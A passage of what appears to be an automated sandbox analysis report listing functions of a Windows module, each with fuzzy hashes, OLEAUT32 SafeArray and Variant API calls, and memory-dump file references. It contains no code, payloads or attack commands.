Opcode Fuzzy Hash: 033fd9a9ea5863c1b3931a62b07d07d3d17f1ece3f8986b2624dafa696f8052e
Instruction Fuzzy Hash: D4016171449B00DEE720DF65D40574DFBF0BF45328F51890ED699973A0CBB4A641CB12

Uniqueness

Uniqueness Score: -1.00%

Function 6D088A9A Relevance: 9.1, APIs: 6, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: c85850b002bbef58a10b736d18472435ff6cd8c370caf52902eaee29ec55bdce
Instruction ID: bce92034e73f04b1830b25f6f586bcef7c8df0d605d6afed707cabbec3cd5b08
Opcode Fuzzy Hash: c85850b002bbef58a10b736d18472435ff6cd8c370caf52902eaee29ec55bdce
Instruction Fuzzy Hash: 0F410B74A016159FEF00DFA9C980F6AB7F9AF89300F608589E519DB396DB31E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D088DE8 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 4d0f5fa906145b4e4e9d077d9bfc441697ee8d614990e3c73f719f1856975e5c
Instruction ID: d8e534b6009aba77156d9580d237a4cfda2e8006feaa853a65d16475d2ce4352
Opcode Fuzzy Hash: 4d0f5fa906145b4e4e9d077d9bfc441697ee8d614990e3c73f719f1856975e5c
Instruction Fuzzy Hash: 84413B70A006199FEF10DFA8CC80F6EB7F9AF89200F60859AE519E7296D771E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D080338 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 4d0f5fa906145b4e4e9d077d9bfc441697ee8d614990e3c73f719f1856975e5c
Instruction ID: 7d2c2497ad07ec7d965e3909c3f9218a291d1f4bacb575c05d81bc5da8a76cc6
Opcode Fuzzy Hash: 4d0f5fa906145b4e4e9d077d9bfc441697ee8d614990e3c73f719f1856975e5c
Instruction Fuzzy Hash: 98414C70A006099FEF10CFA9CC80F6DB7F9AF89200F60859AE518EB252CB71D941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D088CE7 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 38111814b03541b1f523cb5c487b2256ad3c96600d259a66b3a7f33f8940fa53
Instruction ID: 9306470b84d0aa6c4b22651546c1149644a0cba5c4d1f3ca39219806e56842e3
Opcode Fuzzy Hash: 38111814b03541b1f523cb5c487b2256ad3c96600d259a66b3a7f33f8940fa53
Instruction Fuzzy Hash: 92310970E006199FDF10CBA8CD80F6EB7F9AF89200F608696E519E7296D775E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D088F83 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 7d62d1d5913d12a89f94e0a8d9bf1d1c30f570aa3d96e1a9fe737c2a0b896793
Instruction ID: 9a3ed523a5556161c3eb23622e4667e6e0023a8fda443544cf032bb1df1c233c
Opcode Fuzzy Hash: 7d62d1d5913d12a89f94e0a8d9bf1d1c30f570aa3d96e1a9fe737c2a0b896793
Instruction Fuzzy Hash: 71310970A006199FDB10CFA9CC80F6EB7F9AF89200F608596E519E7296DB75ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D088BDD Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 620ae91f9412e1bf08adc27904f892d8de9720ccf7d69200d17c865607f770f7
Instruction ID: 0f23c136ee354251e791d2d7025fc357ec1ec4e8e3f91ae8ad99f7bdbe8a6774
Opcode Fuzzy Hash: 620ae91f9412e1bf08adc27904f892d8de9720ccf7d69200d17c865607f770f7
Instruction Fuzzy Hash: 88310870E016199FEF10DFA8CC80F6EB7F9AF89200F208996E519E7296D775E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0805DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 0a62027278583f774155fa03a51486fb94f1ead76f221510e117231dc3c48d43
Instruction ID: f10f3f0c1c9d4882bfbc057222614926447186396e534f06a4e90b60ebae97f5
Opcode Fuzzy Hash: 0a62027278583f774155fa03a51486fb94f1ead76f221510e117231dc3c48d43
Instruction Fuzzy Hash: 26312A70A006199FEB10CFA9CD80B6DB7F9AF89300F20859AE519EB252DB71D940CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0804D3 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 7d62d1d5913d12a89f94e0a8d9bf1d1c30f570aa3d96e1a9fe737c2a0b896793
Instruction ID: 162bce0b3d382c65061ae04b41ee7664be797568c0a77727b592574068501b3b
Opcode Fuzzy Hash: 7d62d1d5913d12a89f94e0a8d9bf1d1c30f570aa3d96e1a9fe737c2a0b896793
Instruction Fuzzy Hash: 1E313B70E016099FDF10CFA9CC80B6EB7F9AF89300F608596E518EB252CB71D9418F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D080668 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: be68910cdd67a2ac3717fbc0518b4150762e798a8408fc85f24707e34a615d00
Instruction ID: 5b59100de053d680216e4b3de4246129cb2751c74cedf558d5c5a22b9cd2a5de
Opcode Fuzzy Hash: be68910cdd67a2ac3717fbc0518b4150762e798a8408fc85f24707e34a615d00
Instruction Fuzzy Hash: B9310A70A016199FEF10CFA9CD80B6DB7F9AF89300F60859AE519EB252DB71D9418F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D089118 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: be68910cdd67a2ac3717fbc0518b4150762e798a8408fc85f24707e34a615d00
Instruction ID: c85e5e3689ddf2df84bda27dab37894e522e5e53e38206faf511812659c8541e
Opcode Fuzzy Hash: be68910cdd67a2ac3717fbc0518b4150762e798a8408fc85f24707e34a615d00
Instruction Fuzzy Hash: 6F310970A006199FDF10DB68CD80F6EB7F9AF89200F608596E519E7292D775E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0891A9 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 429e38478123fd34175f0f560ac2a57b5d3fc06dbcb8439f8f4f2e1821572535
Instruction ID: a2185ae1024f2b6867a7fbff950a22c948394c076d772987d1e221c110c8f484
Opcode Fuzzy Hash: 429e38478123fd34175f0f560ac2a57b5d3fc06dbcb8439f8f4f2e1821572535
Instruction Fuzzy Hash: 35311770A006199FEF10DBA8CD80F6EB7F9AF89200F208596E519E7292D775E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D089237 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 2d3ef6944112cbbcdf60fced1026b10fe17df866d22c28efc40e5165727bd0d5
Instruction ID: 5abd60d66f7fe4f11ba625957c6cc68ed9020113ad247e0a54ac1c0b28d62fde
Opcode Fuzzy Hash: 2d3ef6944112cbbcdf60fced1026b10fe17df866d22c28efc40e5165727bd0d5
Instruction Fuzzy Hash: 60310770A016199FEF10DBA8CC80F6EB7F9AF89200F208596E519E7292D775E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0892C5 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: d18722ec1b146dee970b46822465c418c8c42c7a76595280f358a804e93db94f
Instruction ID: 9d8455bd063ccc46f96228bf916d7fee86511d20e72bc04815ddf6b4b30bf36b
Opcode Fuzzy Hash: d18722ec1b146dee970b46822465c418c8c42c7a76595280f358a804e93db94f
Instruction Fuzzy Hash: 0C310770A006199FEB10DBA8CC80F6EB7F9AF89300F208596E519E7296D775E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D08C150 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D08C180
SafeArrayPutElement.OLEAUT32(00000000,6D083749,?), ref: 6D08C1B8
VariantClear.OLEAUT32(?), ref: 6D08C1C4
VariantCopy.OLEAUT32(6D083749,?), ref: 6D08C21B
VariantClear.OLEAUT32(?), ref: 6D08C22F
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D08C23E

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
